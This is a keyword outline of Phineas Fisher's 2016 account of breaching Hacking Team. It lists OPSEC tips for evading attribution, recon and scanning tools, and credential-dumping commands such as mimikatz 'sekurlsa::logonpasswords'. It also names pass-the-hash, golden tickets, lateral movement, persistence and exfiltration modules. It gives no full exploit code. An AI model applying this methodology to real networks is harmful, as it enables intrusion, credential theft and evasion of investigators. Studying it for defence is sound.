Hacking Team Writeup
by Phineas Fisher (2016)
| Remark |
|---|
| #antisec |
| Phineas is disgusted by “sellouts” |
| Hacking Team |
| Tor isn’t a panacea |
| OPSEC considerations |
| Whonix, Tails, Qubes TorVM |
| wifislax - wifi cracking distro |
| VPN |
| Jeremy Hammond busted by correlating home address w/ VPN |
| dont hack directly from Tor - blacklists |
| DNS tunneling |
| command and control |
| connect-back shells |
| stable servers |
| hacked servers |
| pay for VPS with Bitcoin |
| attribution |
| APT |
| code and TTP reuse as attribution |
| public tools as plausible deniability |
| changing tactics to avoid being profiled |
| “Google Hacking for Penetration Testers” |
| subdomain enumeration |
| fierce |
| theHarvester |
| recon-ng |
| whois + reverse whois |
| site:domaintools.com |
| site:www.find-ip-address.com |
| port scanning |
| service fingerprinting |
| IDS |
| “the whole internet is being scanned constantly” |
| nmap |
| zmap |
| masscan |
| WhatWeb |
| BlindElephant |
| social engineering |
| data.com/jogsaw |
| file metadata |
| metagoofil |
| FOCA (metadata) |
| foothold |
| try easy, common techniques first |
| spear phishing |
| targeted attacks |
| buying access |
| Joomla |
| Joomscan |
| VPN appliances |
| 0-day |
| postfix |
| reverse engineering |
| leveraging bugs in embedded devices |
| backdoored firmware |
| post exploitation |
| backdoor |
| busybox |
| Responder.py |
| Python |
| tcpdump |
| dsniff |
| socat |
| GNU screen |
| SOCKS proxy |
| tgcd |
| testing tools and attack kits prior to use |
| Responder.py -A |
| NoSQL |
| MySQL authentication bypass |
| mongodb |
| RCS |
| GridFS |
| torrent |
| Shodan |
| insecure backups |
| iSCSI |
| Synology |
| NAS |
| port forwarding |
| iscsiadm |
| iptables |
| vmfs-fuse |
| losetup |
| fdisk |
| mount |
| VHD |
| pwdump |
| cachedump |
| lsadump |
| registry hives |
| proxychains |
| smbclient |
| Metasploit |
| psexec.ps1 |
| meterpreter |
| process migration |
| “load kiwi” |
| “creds_wdigest” |
| Domain Admin |
| PowerShell |
| New-MailboxExportRequest |
| Microsoft Exchange |
| lateral movement |
| mimikatz |
| sekurlsa::logonpasswords |
| sekurlsa::msv |
| runas |
| PowerUp |
| bypassuac |
| privilege escalation |
| psexec |
| WMI |
| winexe |
| PowerShell Empire invoke-psexec |
| sc.exe |
| pth-win.exe |
| Event ID 7045 “Service Control Manager” |
| Event Logs |
| wmiexec.py |
| pth-wmis |
| pass the hash |
| wmic |
| PSRemoting |
| dont recommend opening new protocols |
| Windows 10 |
| Scheduled Task |
| schtasks.exe |
| GPO |
| GPO logon script |
| GPO install msi |
| GPO scheduled task |
| token stealing - mimikatz token::xxx |
| MS14-068 |
| Kerberos |
| Domain Admin Tickets |
| sekurlsa::pth |
| process injection |
| RAT |
| pupy_migrate command |
| pupy |
| meterpreter-migrate |
| psinject_empire |
| persistence |
| Duqu 2-style persistence |
| high uptime servers as targets |
| golden ticket |
| backup access |
| PowerView |
| Windows 2000, 2003 lacking PowerShell |
| netview.exe |
| net view |
| Invoke-ShareFinderThreaded |
| Select-String |
| Out-File |
| reading email |
| reading SharePoint |
| Active Directory |
| Nagios |
| Get-Keystrokes |
| Get-TimedScreenshot |
| PowerSploit |
| Do-Exfiltration |
| nishang |
| hunting sysadmins |
| CredMan.ps1 |
| searching for interesting files |
| TrueCrypt volumes |
| weak passwords |
| passwords.txt |
| git repos |
| sudo |
| password reuse |
| GitLab |
| “forgot my password” + mailserver access |
| ethical hacking |
| encrypted email - GPG/PGP |
| Enigmail |
| Links |